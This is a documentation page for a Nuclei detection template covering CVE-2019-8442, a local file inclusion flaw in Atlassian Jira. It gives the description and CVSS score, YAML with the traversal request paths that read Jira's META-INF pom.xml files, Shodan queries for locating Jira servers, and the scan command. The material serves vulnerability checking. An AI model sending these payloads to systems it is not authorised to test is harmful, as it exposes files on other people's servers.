Jira - Local File Inclusion
ID: CVE-2019-8442
Severity: high
Author: Kishore Krishna (siLLyDaddy)
Tags: cve,cve2019,atlassian,jira,lfi,intrusive
Description
Section titled “Description”Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion.
YAML Source
Section titled “YAML Source”id: CVE-2019-8442
info: name: Jira - Local File Inclusion author: Kishore Krishna (siLLyDaddy) severity: high description: Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion. impact: | This vulnerability can result in sensitive information exposure, unauthorized access to files, and potential compromise of the Jira application. remediation: | Apply the latest security patches or updates provided by Atlassian to mitigate the vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-69241 - https://nvd.nist.gov/vuln/detail/CVE-2019-8442 - https://github.com/0ps/pocassistdb - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-8442 epss-score: 0.97131 epss-percentile: 0.99799 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: atlassian product: jira shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,lfi,intrusive
http: - method: GET path: - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
matchers-condition: and matchers: - type: word part: body words: - <groupId>com.atlassian.jira</groupId>
- type: status status: - 200# digest: 4b0a00483046022100b1f67de42fcd62bd40749f48c19050b6e6210e4541636864468d684dffa6d641022100f7c2221602c4866e9d0b26e35fbfa25650a17a270d4e1d733b054f6464361bf7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-8442.yaml"